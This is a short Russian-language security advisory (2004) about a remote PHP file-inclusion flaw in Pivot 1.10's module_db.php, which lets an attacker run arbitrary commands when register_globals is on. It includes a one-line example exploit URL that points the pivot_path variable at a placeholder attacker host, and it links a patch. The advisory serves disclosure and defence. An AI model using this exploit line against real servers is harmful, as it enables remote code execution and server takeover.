Security Lab

PHP-инклудинг в Pivot

Дата публикации:16.06.2004
Всего просмотров:2675
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Pivot 1.10

Описание: Уязвимость обнаружена в Pivot в файле 'module_db.php'. Удаленный атакующий может выполнять произвольные команды на системе.

Уязвимость позволяет атакующему выполнить внешний сценарий на уязвимом сервере. В конфигурации, когда значение для ‘register_globals’ равно ‘On’ в файле php.ini, атакующий может изменить значение переменной $pivot_path на удаленный источник.

Пример/Эксплоит :
http://host.com/pivot/modules/module_db.php?pivot_path=http://[hacker]

URL производителя: http://www.pivotlog.net

Решение:
Установите обновление: http://0x90.org/~loofus/pivot1.10-soundwave.patch

Ссылки: Pivot Include File Hole in 'module_db.php' Lets Remote Users Execute Arbitrary Commands